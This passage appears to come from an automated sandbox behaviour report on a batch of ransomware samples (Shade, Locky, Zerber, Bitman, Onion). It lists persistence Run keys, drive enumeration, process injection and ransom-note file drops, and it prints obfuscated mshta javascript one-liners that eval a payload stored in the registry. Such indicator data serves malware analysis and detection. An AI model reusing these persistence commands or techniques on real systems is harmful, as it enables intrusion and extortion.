description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\pfjouonwqeua = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\bqsfahnmfxri.exe\"" bqsfahnmfxri.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wmixodiq = "\"C:\\Windows\\isrnabuf.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\addon_v57 = "C:\\Windows\\vmsmqjynx.exe" vmsmqjynx.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java = "cmd /c \"start \"Java\" \"C:\\Program Files (x86)\\Java\\java.exe\"" REG.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\B9oBmLC = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\duvwmbl.exe" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\eubxyltijvie = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\hbuuvsjbfrbv.exe\"" hbuuvsjbfrbv.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\ebdc0366\\21561955.lnk\"" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\12_23-dst = "C:\\Windows\\lpdcqkacfhfo.exe" lpdcqkacfhfo.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\vvaxamalbixx = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\ojfkrsimvjds.exe\"" ojfkrsimvjds.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:dtaeo0U=\"b7YyjL\";xj6=new%20ActiveXObject(\"WScript.Shell\");IGTFB83F=\"ACjjU\";rJXZ0=xj6.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\npzlo\\\\uhlmbbrw\");VUpp1=\"6lbPLIX\";eval(rJXZ0);pzlqE2T3=\"5mVpHm\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\{28D24500-894F-7556-88CC-1788A53DA56B} = "C:\\Users\\Admin\\AppData\\Roaming\\Siybp\\geaw.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Creative SoundBlaster = "C:\\Users\\Admin\\AppData\\Local\\CTHelpers.exe" CTHelpers.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:ODUPlu3g=\"yNwW\";cI1=new%20ActiveXObject(\"WScript.Shell\");B4Jeh=\"l5iGM\";dIud5=cI1.RegRead(\"HKCU\\\\software\\\\npzlo\\\\uhlmbbrw\");ihQ03gYO=\"EzB8\";eval(dIud5);mLxP6H8VD=\"3SOMGx65\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\rmpyugx = "C:\\Windows\\system32\\CMD.EXE /c start C:\\Windows\\qbqsfahnmfxr.exe" qbqsfahnmfxr.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft corporation = "C:\\Users\\Admin\\JSMURNPT2182-CD9A.exe" HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe -
pid Process 5624 powershell.exe -
Enumerates connected drives 3 TTPs 43 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: Rj3fNWF3.exe File opened (read-only) \??\R: Rj3fNWF3.exe File opened (read-only) \??\X: Rj3fNWF3.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\K: Rj3fNWF3.exe File opened (read-only) \??\T: Rj3fNWF3.exe File opened (read-only) \??\V: Rj3fNWF3.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\G: Rj3fNWF3.exe File opened (read-only) \??\M: Rj3fNWF3.exe File opened (read-only) \??\Q: Rj3fNWF3.exe File opened (read-only) \??\Y: Rj3fNWF3.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\E: Rj3fNWF3.exe File opened (read-only) \??\I: Rj3fNWF3.exe File opened (read-only) \??\Z: Rj3fNWF3.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\P: Rj3fNWF3.exe File opened (read-only) \??\U: Rj3fNWF3.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\O: Rj3fNWF3.exe File opened (read-only) \??\S: Rj3fNWF3.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\L: Rj3fNWF3.exe File opened (read-only) \??\N: Rj3fNWF3.exe File opened (read-only) \??\W: Rj3fNWF3.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe File opened (read-only) \??\H: Rj3fNWF3.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67800 ipecho.net -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum java.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 java.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 39 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe -
Sets desktop wallpaper using registry 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Documents\\images.jpg" Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\My Wallpaper.jpg" Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DDx.bmp" Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\DesktopOSIRIS.bmp" Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2256 Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe 2188 Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe 41076 svchost.exe 16040 svchost.exe -
Suspicious use of SetThreadContext 27 IoCs
description pid Process procid_target PID 3048 set thread context of 14532 3048 HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe 72 PID 1968 set thread context of 14428 1968 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 74 PID 2428 set thread context of 4884 2428 Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe 81 PID 796 set thread context of 41088 796 UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe 86 PID 700 set thread context of 41416 700 Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe 88 PID 1836 set thread context of 40984 1836 Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe 93 PID 1036 set thread context of 40484 1036 Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe 98 PID 2416 set thread context of 38476 2416 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe 99 PID 3060 set thread context of 38576 3060 HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe 100 PID 2168 set thread context of 36852 2168 Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe 101 PID 36852 set thread context of 36888 36852 svchost.exe 102 PID 14428 set thread context of 5592 14428 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 119 PID 1168 set thread context of 5848 1168 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe 121 PID 2300 set thread context of 27600 2300 Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe 133 PID 2260 set thread context of 26376 2260 Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe 137 PID 1016 set thread context of 35460 1016 Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe 154 PID 2280 set thread context of 35856 2280 Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe 157 PID 5624 set thread context of 9496 5624 powershell.exe 169 PID 40412 set thread context of 34664 40412 qbqsfahnmfxr.exe 173 PID 1144 set thread context of 34600 1144 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe 174 PID 9496 set thread context of 37156 9496 regsvr32.exe 172 PID 36968 set thread context of 7860 36968 bqsfahnmfxri.exe 175 PID 40684 set thread context of 33700 40684 mfxriq.exe 178 PID 5708 set thread context of 38548 5708 lpdcqkacfhfo.exe 191 PID 2208 set thread context of 27940 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 202 PID 16804 set thread context of 38816 16804 vmsmqjynx.exe 203 PID 10452 set thread context of 45284 10452 ojfkrsimvjds.exe 219 -
resource yara_rule behavioral1/memory/1480-12733-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/memory/1480-12732-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/memory/27600-54288-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral1/memory/27600-54381-0x0000000000400000-0x000000000043D000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png mfxriq.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\spu\Recovery+qiweg.html bqsfahnmfxri.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\Recovery+qiweg.png bqsfahnmfxri.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\_ReCoVeRy_+pqnjv.html mfxriq.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\_ReCoVeRy_+lpoqi.html qbqsfahnmfxr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png lpdcqkacfhfo.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\Recovery+armja.png lpdcqkacfhfo.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\Recovery+armja.txt lpdcqkacfhfo.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\_ReCoVeRy_+lpoqi.txt qbqsfahnmfxr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\it-IT\Recovery+qiweg.txt bqsfahnmfxri.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\_ReCoVeRy_+lpoqi.txt qbqsfahnmfxr.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\_ReCoVeRy_+pqnjv.html mfxriq.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\Recovery+armja.txt lpdcqkacfhfo.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv lpdcqkacfhfo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\Recovery+kuuko.png hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\_ReCoVeRy_+pqnjv.txt mfxriq.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\Recovery+kuuko.html hbuuvsjbfrbv.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\_ReCoVeRy_+pqnjv.png mfxriq.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mousedown.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\Recovery+armja.txt lpdcqkacfhfo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\Recovery+qiweg.txt bqsfahnmfxri.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\it-IT\_ReCoVeRy_+pqnjv.html mfxriq.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png bqsfahnmfxri.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\_ReCoVeRy_+lpoqi.txt qbqsfahnmfxr.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eo\Recovery+armja.html lpdcqkacfhfo.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\Recovery+qiweg.png bqsfahnmfxri.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification 